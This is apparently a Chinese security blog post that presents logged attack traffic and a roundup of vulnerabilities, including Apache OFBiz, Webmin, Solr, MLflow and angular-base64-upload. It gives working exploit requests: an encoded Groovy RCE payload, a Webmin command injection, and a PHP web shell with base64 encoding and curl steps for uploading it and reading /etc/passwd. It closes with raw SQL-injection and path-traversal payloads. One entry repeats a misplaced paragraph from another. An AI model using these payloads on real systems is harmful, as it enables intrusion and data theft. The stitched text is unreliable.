文章总结: 这篇文章详细分析了多个近期发现的安全漏洞,包括ApacheOFBiz远程代码执行漏洞、TurboMeetingSQL注入漏洞、MLflow认证绕过漏洞等。文章提供了每个漏洞的CVE编号、影响版本、漏洞详情以及部分漏洞的复现方法和利用代码。这些漏洞涉及多个应用程序和平台,可能导致远程代码执行、敏感信息泄露和身份验证绕过等安全问题。建议相关系统管理员及时更新受影响的应用程序,并采取适当的安全措施来防范这些漏洞的利用。
综合评分: 86
文章分类: 漏洞分析,威胁情报,WEB安全,漏洞预警,应急响应
威胁情报:某恶意IP攻击流量分析(一)
原创
小话安全
小话安全
2025年11月19日 00:09
山东
1.CVE-2024-38856:Apache OFBiz远程代码执行漏洞
Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
影响版本:Apache OFBiz <= 18.12.14
漏洞复现
POST /webtools/control/main/ProgramExport HTTP/1.1Host: 127.0.0.1:8443Connection: closeUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 272groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
2.TurboMeeting SQL注入漏洞
TurboMeeting是一款功能丰富的视频会议软件,旨在为用户提供高效、便捷的远程会议体验。
漏洞详情
#
#
CVE-2024-38289
漏洞类型:SQL注入
影响:获取敏感信息
简述:TurboMeeting的/as/wapi/vmp接口存在SQL注入漏洞,该漏洞允许未经身份验证的远程攻击者从数据库中提取哈希密码,并通过构建的SQL输入向应用程序进行身份验证。
3.MLflow中认证绕过漏洞
在MLflow 1.x版本中,若未启用身份验证机制(如Basic Auth或OAuth),攻击者可直接访问REST API接口(如/api/2.0/mlflow/experiments/create)创建实验或读取模型数据。
攻击路径拆解:从API暴露到Artifact窃取
探测开放的MLflow服务端口(默认5000)调用GET /api/2.0/mlflow/experiments/list获取所有实验ID遍历每个实验调用GET /api/2.0/mlflow/runs/search获取运行实例及其artifact_location解析返回的artifact路径(如s3://mlflow-bucket/1/abc/artifacts)若该存储桶策略允许公共读取或密钥泄露,则直接通过AWS CLI或HTTP下载模型文件即使存储未完全公开,也可尝试利用SSRF或内部网络跳板进行横向渗透
4.OpenAM FreeMarker模板注入漏洞
综合访问管理解决方案 Open Identity Platform OpenAM 中发现了一个严重的安全漏洞,编号为CVE-2024-41667,CVSS 评分为8.8。此漏洞允许远程攻击者在受影响的系统上执行任意代码,对利用 OpenAM 进行身份验证、单点登录 (SSO)、授权、联合、授权和 Web 服务安全的组织构成重大威胁。
详情见链接:
https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-7726-43hg-m23v
5. OpenAPI Generator 污点流漏洞
OpenAPI Generator 是一个在 GitHub 上拥有超过 20k star 的流行工具,
OpenAPI 规范自动生成源代码。
由于攻击者可以控制此路径,并且没有验证所提供的目录是否位于预期的临时文
件夹内,攻击者可以使用路径遍历序列 (../) 来指向任意可写文件夹。
zip.compressFiles 方法会递归地将此目录中的所有文件和文件夹添加到 zip
存档中,然后该存档可以被下载。例如,以下请求可用于将目录设置为
/home/user/.ssh
POST /api/gen/clients/csharp HTTP/1.1Host: api.openapi-generator.tech...{ "authorizationValue": { "keyName": "string", "type": "string", "value": "string" }, "openAPIUrl": "https://raw.githubusercontent.com/OpenAPITools/openapi-generator/master/modules/openapi-generator/src/test/resources/2_0/petstore.yaml", "options": {"outputFolder":"../../../../home/user/.ssh"}, "spec": {}}
6.Apache Solr 身份验证绕过漏洞
漏洞复现
在未登录的情况下访问/solr/admin/info/properties会返回401
在 url 后面添加:/admin/info/key,向请求头中添加SolrAuth头,即可绕过身
份验证,成功返回配置信息。
7.Webmin 代码执行漏洞
由于攻击者可以控制此路径,并且没有验证所提供的目录是否位于预期的临时文件夹内,攻击者可以使用路径遍历序列 (../) 来指向任意可写文件夹。zip.compressFiles 方法会递归地将此目录中的所有文件和文件夹添加到 zip 存档中,然后该
Webmin 是一个用于管理类 Unix 系统的管理配置工具,具有 Web 页面。
该漏洞由于 password_change.cgi 文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许
恶意第三方在缺少输入验证的情况下而执行恶意代码。
POST /password_change.cgi HTTP/1.1Host: your-ip:10000Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeCookie: redirect=1; testing=1; sid=x; sessiontest=1Referer: https://your-ip:10000/session_login.cgiContent-Type: application/x-www-form-urlencodedContent-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
8.Angular 未经身份验证的远程代码执行
由 Adones 创建的 angular-base64-upload 库 Pitogo 是一种工具,旨在简化上传 base64 编码文件的过程 Angular 应用程序。版本 <= v0.1.20 包含可能导致未经身份验证的远程代码的关键安全漏洞 执行 (RCE)。利用此漏洞,攻击者可以将任意文件内容上传到服务器,随后可以通过 angular-base64-upload/demo/uploads 端点访问这些内容。
利用方式
-
向 /angular-base64-upload/demo/server.php 端点发送 curl 请求,查看 而是服务器未使用 HTTP 响应代码 404 进行响应。你可能会得到 500 分。这可以用于标识目标是否为无论是否脆弱。您也可以使用 angular-base64-upload/demo/index.html 来测试这一点(只需 就像在 PoC 漏洞中一样)。
-
使用 PHP 命令 shell 发送另一个 curl POST 请求(这将在下一个 步骤) 或 php-reverse-shell 连接到服务器。Write 或 下载有效负载,然后将有效负载的内容编码为 Base64。
例:
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
- 将负载转换为 Base64 格式
PD9waHAKICAgIGlmKGlzc2V0KCRfR0VUWydjbWQnXSkpCiAgICB7CiAgICAgICAgc3lzdGVtKCRfR0VUWydjbWQnXSAuICcgMj4mMScpOwogICAgfQo/Pg==
- 发送以下请求,文件名为 shell.php,内容为 base64 参数值。
curl -lk -X POST \
-H "Content-Type: application/json" \
-d '{"base64": "<base64-content>", "filename": "shell.php"}' \
"http://$domain/{node_modules/bower_components}/angular-base64-upload/demo/server.php"
- 现在,访问上传到服务器文件夹的shell.php。
curl -lk "http://$domain/{node_modules/bower_components}/demo/uploads/shell.php?cmd=cat+%2Fetc%2Fpasswd"
- 这将在服务器上执行 cat /etc/passwd 命令,其输出将显示在 HTTP 响应正文(受害者的 /etc/passwd 文件的内容)。
其他
POST /api/v1/chart/data HTTP/1.1User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36Connection: closeContent-Length: 280Content-Type: application/jsonAccept-Encoding: gzipX-Forwarded-For: 191.101.132.180请求体{"datasource":{"id":1,"type":"table"},"queries":[{"row_limit":1, "columns":[{"sqlExpression":"query_to_xml($$select convert_from(decode('MzVLZVRkQzNaQzBiRThIRkJBZlVuckdXczNq', 'base64'),'utf8')$$,true,true,'')-- -", "label":"aaaa", "expressionType":"SQL"}]}]}
/?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9
/business-directory/?dosrch=1&q&wpbdp_view=search&listingfields[+or+sleep(if(1=1,6,0))+))--+-][1]/zm/index.php?sort=if(now()=sysdate(),sleep(6),0)&order=desc&limit=20&view=request&request=watch&mid=1/WebInterface//html/usr/share/doc/hostname/copyright?/mdm/checkin /v1/app/readFileSync
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1Host: User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Connection: closeContent-Length: 139Content-Type: application/jsonAccept-Encoding: gzipX-Forwarded-For: 191.101.132.180请求体{"name": "35KeUDhvfdRSB0HQSXOG1Am8whs", "artifact_location": "http:\/\/\/#\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/"}
/WSStatusEvents/EventHandler.asmx
/importexport.php?sql=c2VsZWN0KzksbWQ1KDkyMDczODgpLDk=&type=exportexcelbysql
/geoserver/TestWfsPost
/xwiki/bin/register/XWiki/XWikiRegister?xredirect=/bin/register/XWiki/XWikiRegister?xredirect=%2Fxwiki%2Fbin%2Fview%2FScheduler%2F%3Fdo%3Dtrigger%26which%3DScheduler.NotificationEmailDailySender
/apriso/portal/kiosk/querylogin.aspx
/index.cfm/_api/json/v1/default/?method=processAsyncObject
/rest/V1/guest-carts/1/estimate-shipping-methods
/global-protect/portal/images/35KeUFDl42LiUXxvJybiCNIHm8x.txt
/admin/pr_monitor/getting_index_data.php
/api/v1/livechat/sms-incoming/twilio
/client/api?command=samlSso
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:小话安全 小话安全《威胁情报:某恶意IP攻击流量分析(一)》